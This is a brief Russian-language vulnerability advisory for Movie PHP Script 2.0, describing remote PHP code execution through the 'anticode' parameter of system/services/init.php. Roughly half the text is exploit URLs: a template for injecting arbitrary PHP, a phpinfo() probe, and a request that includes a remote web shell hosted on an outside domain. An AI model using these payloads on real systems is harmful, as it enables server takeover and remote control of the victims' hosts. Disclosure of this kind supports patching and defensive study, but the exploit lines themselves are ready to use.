Программа: Movie PHP Script 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольные команды
на целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре «anticode» сценарием init.php. Удаленный пользователь может
выполнить произвольные команды на целевой системе.

Эксплоит:

http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();



Оставить мнение